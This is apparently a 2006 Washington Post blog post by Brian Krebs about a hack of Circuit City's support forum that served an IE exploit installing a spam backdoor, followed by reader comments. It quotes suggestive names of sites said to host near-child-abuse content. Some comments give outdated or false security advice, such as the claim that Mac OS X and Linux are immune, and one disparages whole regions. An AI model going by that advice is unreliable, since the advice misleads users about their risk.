Network News

X My Profile
View More Activity

Circuit City Support-Site Hack Installed Spamming Program

The customer support Web site for Richmond-based Circuit City, a leading supplier of computers and other consumer electronics, was for several weeks serving up an invasive computer virus to any visitor who browsed the site with an unpatched version of Microsoft's Internet Explorer Web browser.

It appears that unknown hackers broke into the retailer's support forum via a recently patched security flaw in Invision Power Forum, the software the company uses to run the site. Anyone who visited the forum in IE without the protection afforded by a security patch Microsoft released in January most likely got whacked with an exploit that drops a nasty program which gives attackers control over the victim's PC.

Circuit City spokesman Bill Cimino said the company learned of the breach today and has removed the attack code that plants the malicious program and updated its site software to the latest, patched version. Cimino said Circuit City also planned to notify the forum's registered users of the potential threat. Cimino said the problem was confined to its forum.circuitcity.com Web site, and that at no time was the company's main CircuitCity.com page affected.

The forum was hacked some time on May 13, and chances are quite a few people have been potentially exposed to this threat. According to Web traffic-monitoring company Alexa, CircuitCity.com is among the Web's 500 most-visited sites.

Cimino said the company is still trying to determine how many people visited the forum since May 13, but he noted that only about 200 registered users did so during that time. The user forum is hosted by a separate company on a different Web server than CircuitCity.com, but it is reachable from the company's home page.

Up until this afternoon, a vulnerable IE browser visiting the support forum would have silently contacted a .biz Web site -- hosted in Russia -- which tries to install a program that opens a "back door" on the victim's computer. The attackers could then have used the "back door" to come back whenever they wanted to install programs, delete files, change system settings etc.

The threat in this case was a thing called "Galapoper," which according to anti-virus firm Panda Software "sends spam messages with highly variable characteristics, which it composes with the information it obtains from several servers. It can be instructed to modify those e-mail messages every 10 minutes, or whenever an amount of 70,000 e-mail messages sent is reached."

I should also note that the site used in this exploit is on the same block of Internet addresses as a Web server in Russia that -- according to Web site monitoring company Netcraft -- is the same group of servers I wrote about in an investigative story earlier this year as being connected to disturbing new advancements in keystroke-logging programs.

[SAFETY ALERT: Unless you are a computer security expert and preferably not using Microsoft Windows, please do not attempt to visit any of the sites mentioned in this paragraph.] Among the other domains on this same Russian Internet address space are dozens of porn sites featuring content that borders on child pornography, with sites like "lolita-links," "little-boyz.com," "littlelust.com," "tinyorgy.com" and "pay-sites.lolita-preteen-bbs.com".

The Russian company hosting the .biz site that the Circuit City support forum virus contacted also hosts a number of sites used to download bogus anti-spyware applications. These programs are proliferated by browser exploits that install themselves and then scare victims with false reports about spyware infections, all to trick the user into paying for anti-spyware software that usually doesn't even work.

This group of Web servers also is home to many of the sites that were taking advantage of the flaw even before Microsoft issued its patch. Allow me to take you back: This security update was the very first that Microsoft shipped in 2006. Hundreds of malicious Web sites had been exploiting in the final weeks of 2005 and early 2006 to install password-stealing Trojan horse programs on IE users' compjuters. Hundreds more innocent Web sites were hacked and seeded with the exploit code, including at least two I found in my own reporting. At least two independent security experts developed and made public their own security patches to fix the problem before Microsoft issued an official update.

By Brian Krebs  |  June 1, 2006; 3:26 PM ET
Categories:  Latest Warnings  
Save & Share:  Send E-mail   Facebook   Twitter   Digg   Yahoo Buzz   Del.icio.us   StumbleUpon   Technorati   Google Buzz   Previous: Modern Mischief and the Digital Prankster
Next: New Firefox Version Fixes 13 Security Holes

Comments

God, Microsoft sucks.

Posted by: Sloopydrew | June 2, 2006 3:53 PM | Report abuse

For a police state, there certainly is alot of crime and lawlessness in Russia.

I wish my ISP would offer the option of blocking contact with all IP addresses in the following crime-ridden 3rd World countries: Russia, Brazil, China, and all of Eastern Europe.

A regional block would certainly be easier than reading the ISC diary and adding sites and IP addresses, one by one, to my block lists (HOSTS file and I.E.'s Restricted Sites Zone).

Posted by: Ken L | June 2, 2006 4:34 PM | Report abuse

Should have used Kaspersky!

Posted by: Jo | June 3, 2006 12:35 AM | Report abuse

Firefox is the answer...

Posted by: Dave | June 3, 2006 9:41 PM | Report abuse

"Cimino said the problem was confined to its forum.circuitcity.com Web site, and that at no time was the company's main CircuitCity.com page affected."

So, um, only our loyal/most confused (pick one) customers were affected. Anybody thinking of becomming a NEW customer need not worry because we only throw you under the bus AFTER we have your money.

Congratulations on the new job, Scott (McClellan)!!!

Posted by: GTexas | June 4, 2006 4:39 PM | Report abuse

Circuit City won't be the first nor the last that are bitten by this. Also please spare me comments about Kaspersky catching this UNLESS they caught this particular version of malware when all of the other AntiVirus companies failed. I do research in BOTH of these areas and despite warnings to normal people that Porn sites can have threats, I am usually ignored. I have waited patiently as long as nine months for some of the Trojans I have submitted to the AntiVirus companies for any of them to recognize what they are. Tell them (the AntiVirus companies) to fire up their IDA disassemblers and get to work! All of the following WILL help you:

1. Use a AntiVirus program, preferably a DIFFERENT one than the one your ISP uses. The reasoning is simple - if the ISP's AntiVirus program doesn't catch the new hour zero exploit, maybe yours will.
Please don't ask me for recommendations on this. ANY of the good ones are better than none. KEEP THEIR DATA-BASE COMPLETELY UP-TO-DATE!

2. Install a blocking hosts file - you can't have mine, it is experimental. Just do a search for "blocking hosts file" at Google and go from there.
If you use Linux or Mac OS X, say something and mine will no longer be experimental. I have a Pseudo HTTP server (you need one to answer queries on the web page that are now redirected to yourself) that works as a daemon (like a Microsoft service) on these other machines.

3. As much as I would like to say shift to Firefox, I am not going to. It doesn't have the equivalent of IE's restricted sites list. Netscape does, AND they maintain the list of abusers for you. Try it, or Opera.

4. Keep your OS patches up to date. THIS IS MANDATORY!

5. If possible, move to another Operating System (OS) like some version of Linux or Mac OS X. In this case, that may be the best protection from these pesky Microsoft viruses / malware. These other Operating Systems are COMPLETELY IMMUNE to Microsoft Windows viruses! In fact they have almost no viruses at all - the AntiVirus programs for these other operating systems are primarily geared towards removing viruses targeted at MICROSOFT WINDOWS (and the teensy amount targeted at that particular OS they are using).

6. Do some studying to catch PHISH on your own. This is one the AV companies ARE getting good at. The rules are simple - read Washington Post's excellent article on how to avoid getting caught and you WON'T need the AV companies to catch them, UNLESS the message itself can take advantage of your email client to do things automatically.

7. If you still want to continue to Microsoft Windows, get a good anti-spyware strategy. The ones that work best are the ones that prevent the spy from getting on your machine in the first place.

8. Avoid things that will cause problems. There are very badly behaved porn sites (and there ARE good ones that will NOT harm your machine) that WILL find out who you are. If you are important and do NOT want your activity known, THEY CAN AND WILL BLACKMAIL YOU! Even more important, avoid the music stealing and movie stealing programs. They will invariably lead your machine into the red zone.

Posted by: Henry Hertz Hobbit | June 7, 2006 7:58 AM | Report abuse

May I suggest running Webroot Spysweeper with the common ad sites blocker turned on. Its a great inexpensive anti-spyware. For those out there wanting to stay protected for cheap. These are the things you should run on your computer:

Avast Antivirus (Freeware)
On this during the initial setup allow it to sweep at the startup the first time around. This will help check for a pesky root-kit you don't know about.
www.avast.com

Webroot Spysweeper (if you already have it stay ontop of the version updates) (29.99)
On this, on the left side click on options, then turn on whatever has a red X next to it. Also at the top schedue a weekly sweep to remind you to keep after it.
www.webroot.com

Spybot Search and Destroy (Freeware)
Good reliable freebie.
http://www.safer-networking.org/

Lavasoft Ad-aware
On this one before a search, click on custom search and make sure all of you options are on. Then also search for low risk threats.
www.lavasoft.com (DL link is on the right side @ download.com)

Firefox (If you are running it you will notice it blocked a popup for you on this page :) )
www.mozilla.com

If your using IE go to the internet options, then click advanced, scroll to bottom, and check empty temp. internet files when browser is closed. You can also un-check install on demand options ut thats up to you. may cause some webpages to act funny.

Don't look at anything on the net you would not look at with you mother, and avoid party poker. There is no such thing as free these days. I've seen many computers come in with their junk loaded on it along with a bit of spyware.

Good luck.

Good luck.

Posted by: Ryker | June 7, 2006 11:44 AM | Report abuse

The comments to this entry are closed.

 
 
RSS Feed
Subscribe to The Post

© 2010 The Washington Post Company